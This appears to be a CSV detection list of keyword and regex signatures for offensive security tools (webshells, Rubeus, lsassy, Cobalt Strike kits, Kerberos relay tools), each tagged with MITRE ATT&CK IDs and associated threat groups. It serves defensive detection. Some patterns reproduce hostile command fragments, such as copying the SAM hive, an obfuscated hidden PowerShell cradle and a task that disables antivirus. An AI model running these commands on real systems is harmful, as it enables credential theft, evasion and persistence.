"keyword","metadata_keyword_regex","metadata_keyword_type","metadata_tool","metadata_description","metadata_tool_techniques","metadata_tool_tactics","metadata_malwares_name","metadata_groups_name","metadata_category","metadata_link","metadata_enable_endpoint_detection","metadata_enable_proxy_detection","metadata_tags","metadata_comment","metadata_severity_score","metadata_popularity_score","metadata_github_stars","metadata_github_forks","metadata_github_updated_at","metadata_github_created_at","metadata_entry_id"
"* - Antichat Shell*",".{0,1000}\s\-\sAntichat\sShell.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","1"
"* - Bypassing UAC with SSPI Datagram Contexts*",".{0,1000}\s\-\sBypassing\sUAC\swith\sSSPI\sDatagram\sContexts.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","#content","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","2"
"* - c99madshell*",".{0,1000}\s\-\sc99madshell.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","3"
"* - Cracked by Meth.exe*",".{0,1000}\s\-\sCracked\sby\sMeth\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#content","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","4"
"* - delete: Delete a scheduled task. Requires restarting the *",".{0,1000}\s\-\sdelete\:\sDelete\sa\sscheduled\stask\.\sRequires\srestarting\sthe\s.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","#content","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","5"
"* - Dump LSASS memory bypassing countermeasures*",".{0,1000}\s\-\sDump\sLSASS\smemory\sbypassing\scountermeasures.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","0","#content","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","6"
"* - FaTaL Shell v1.0*",".{0,1000}\s\-\sFaTaL\sShell\sv1\.0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7"
"* - KingDefacer*",".{0,1000}\s\-\sKingDefacer.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","8"
"* - Locus7Shell*",".{0,1000}\s\-\sLocus7Shell.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9"
"* - Remote lsass dump reader*",".{0,1000}\s\-\sRemote\slsass\sdump\sreader.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#content","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","10"
"* - Removed disabled accounts from spraying*",".{0,1000}\s\-\sRemoved\sdisabled\saccounts\sfrom\sspraying.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","#content","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","11"
"* - Sensitive Accounts.csv*",".{0,1000}\s\-\sSensitive\sAccounts\.csv.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","12"
"* - ShadowSpray*",".{0,1000}\s\-\sShadowSpray.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","13"
"* - Storm7Shell*",".{0,1000}\s\-\sStorm7Shell.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14"
"* ""Sniffy boi sniffin""*",".{0,1000}\s\""Sniffy\sboi\ssniffin\"".{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","#content","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","15"
"* $exploit_oneliner*",".{0,1000}\s\$exploit_oneliner.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","17"
"* $FodHelperPath*",".{0,1000}\s\$FodHelperPath.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-FodHelperBypass.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","18"
"* $KerbDump*",".{0,1000}\s\$KerbDump.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","19"
"* $lse_find_opts *",".{0,1000}\s\$lse_find_opts\s.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","20"
"* $payload_oneliner *",".{0,1000}\s\$payload_oneliner\s.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","21"
"* ./sf.py -l 127.0.0.1:5001*",".{0,1000}\s\.\/sf\.py\s\-l\s127\.0\.0\.1\:5001.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","#linux","N/A","6","10","N/A","N/A","N/A","N/A","26"
"* ./tor.keyring *",".{0,1000}\s\.\/tor\.keyring\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","27"
"* .\tor.keyring *",".{0,1000}\s\.\\tor\.keyring\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","28"
"* .beacon_keys -*",".{0,1000}\s\.beacon_keys\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","29"
"* .exe -addgroupmember -victim * -target *",".{0,1000}\s\.exe\s\-addgroupmember\s\-victim\s.{0,1000}\s\-target\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","30"
"* .exe -chp -victim * -target *",".{0,1000}\s\.exe\s\-chp\s\-victim\s.{0,1000}\s\-target\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","31"
"* .exe -laps -victim * -target * -clsid *",".{0,1000}\s\.exe\s\-laps\s\-victim\s.{0,1000}\s\-target\s.{0,1000}\s\-clsid\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","32"
"* .exe -ldapwhoami -victim * -target * -clsid *",".{0,1000}\s\.exe\s\-ldapwhoami\s\-victim\s.{0,1000}\s\-target\s.{0,1000}\s\-clsid\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","33"
"* .exe -rbcd -victim * -target * -clsid *",".{0,1000}\s\.exe\s\-rbcd\s\-victim\s.{0,1000}\s\-target\s.{0,1000}\s\-clsid\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","34"
"* /.exegol/*",".{0,1000}\s\/\.exegol\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","35"
"* /altservice:ldap *",".{0,1000}\s\/altservice\:ldap\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","36"
"* /asrepkey*",".{0,1000}\s\/asrepkey.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","37"
"* /c copy *\windows\system32\config\SAM*",".{0,1000}\s\/c\scopy\s.{0,1000}\\windows\\system32\\config\\SAM.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40"
"* /c PoWErSheLl -nopROfi -EXe byPAsS -wiNDOwsTy HIDdEN -cOMMA *",".{0,1000}\s\/c\sPoWErSheLl\s\-nopROfi\s\-EXe\sbyPAsS\s\-wiNDOwsTy\sHIDdEN\s\-cOMMA\s.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","43"
"* /changentlm* /user:* /oldhash:*",".{0,1000}\s\/changentlm.{0,1000}\s\/user\:.{0,1000}\s\/oldhash\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","46"
"* /changentlm* /user:* /oldpwd:*",".{0,1000}\s\/changentlm.{0,1000}\s\/user\:.{0,1000}\s\/oldpwd\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","47"
"* /changentlm* /user:* /oldpwd:*",".{0,1000}\s\/changentlm.{0,1000}\s\/user\:.{0,1000}\s\/oldpwd\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","48"
"* /cmdtech:* /cmd:* /impuser:*",".{0,1000}\s\/cmdtech\:.{0,1000}\s\/cmd\:.{0,1000}\s\/impuser\:.{0,1000}","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","N/A","2","111","20","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z","49"
"* /cmdtech:* /cmd:* /query:*",".{0,1000}\s\/cmdtech\:.{0,1000}\s\/cmd\:.{0,1000}\s\/query\:.{0,1000}","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","N/A","2","111","20","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z","50"
"* /Create /SC ONCE /TN 'DisableBitdefender-*",".{0,1000}\s\/Create\s\/SC\sONCE\s\/TN\s\'DisableBitdefender\-.{0,1000}","offensive_tool_keyword","Dispossessor","scheduled task used by Dispossessor ransomware group to disabled AV","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#scheduledtask","N/A","10","10","N/A","N/A","N/A","N/A","53"
"* /create /tn Notion /tr \*cmd.exe* -c *\* /sc onlogon /ru System\*",".{0,1000}\s\/create\s\/tn\sNotion\s\/tr\s\\.{0,1000}cmd\.exe.{0,1000}\s\-c\s.{0,1000}\\.{0,1000}\s\/sc\sonlogon\s\/ru\sSystem\\.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","N/A","10","10","1161","130","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z","55"
"* /createnetonly:*cmd.exe*",".{0,1000}\s\/createnetonly\:.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","57"
"* /createnetonly:*cmd.exe*",".{0,1000}\s\/createnetonly\:.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","58"
"* /credpassword*",".{0,1000}\s\/credpassword.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","59"
